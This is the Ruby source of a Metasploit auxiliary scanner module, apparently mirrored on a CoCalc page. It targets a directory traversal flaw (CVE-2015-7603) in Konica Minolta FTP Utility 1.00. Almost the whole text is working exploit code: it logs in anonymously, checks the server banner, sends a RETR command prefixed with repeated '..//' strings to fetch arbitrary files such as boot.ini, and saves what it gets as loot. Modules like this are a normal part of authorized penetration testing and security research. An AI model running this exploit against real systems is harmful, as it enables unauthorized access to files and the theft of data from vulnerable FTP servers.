CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Ftp7include Msf::Auxiliary::Report8include Msf::Auxiliary::Scanner910def initialize(info = {})11super(update_info(info,12'Name' => 'Konica Minolta FTP Utility 1.00 Directory Traversal Information Disclosure',13'Description' => %q{14This module exploits a directory traversal vulnerability found in Konica Minolta FTP Utility 1.0.15This vulnerability allows an attacker to download arbitrary files from the server by crafting16a RETR command that includes file system traversal strings such as '..//'17},18'Platform' => 'win',19'Author' =>20[21'Jay Turla', # @shipcod3, msf22'James Fitts', # msf23'Brad Wolfe <brad.wolfe[at]gmail.com>', # msf24'shinnai' # initial discovery25],26'License' => MSF_LICENSE,27'References' =>28[29[ 'EDB', '38260'],30[ 'CVE', '2015-7603'],31[ 'URL', 'https://shinnai.altervista.org/exploits/SH-0024-20150922.html']32],33'DisclosureDate' => '2015-09-22'34))3536register_options(37[38OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),39OptString.new('PATH', [ true, "Path to the file to disclose, relative to the root dir.", 'boot.ini'])40])41end4243def check_host(ip)44begin45connect46if /FTP Utility FTP server \(Version 1\.00\)/i === banner47return Exploit::CheckCode::Appears48end49ensure50disconnect51end5253Exploit::CheckCode::Safe54end5556def run_host(target_host)57begin58# Login anonymously and open the socket that we'll use for data retrieval.59connect_login60sock = data_connect61if sock.nil?62error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; possible invalid response'63print_status(error_msg)64elog(error_msg)65else66file_path = datastore['PATH']67file = ::File.basename(file_path)6869# make RETR request and store server response message...70retr_cmd = ( "..//" * datastore['DEPTH'] ) + "#{file_path}"71res = send_cmd( ["RETR", retr_cmd])7273# read the file data from the socket that we opened74# dont assume theres still a sock to read from. Per #758275if sock.nil?76error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; possible invalid response'77print_status(error_msg)78elog(error_msg)79return80else81# read the file data from the socket that we opened82response_data = sock.read(1024)83end8485unless response_data86print_error("#{file_path} not found")87return88end8990if response_data.length == 0 or ! (res =~ /^150/ )91print_status("File (#{file_path})from #{peer} is empty...")92return93end9495# store file data to loot96loot_file = store_loot("konica.ftp.data", "text", rhost, response_data, file, file_path)97vprint_status("Data returned:\n")98vprint_line(response_data)99print_good("Stored #{file_path} to #{loot_file}")100end101102rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e103vprint_error(e.message)104elog(e)105rescue ::Timeout::Error, ::Errno::EPIPE => e106vprint_error(e.message)107elog(e)108ensure109data_disconnect110disconnect111end112end113end114115116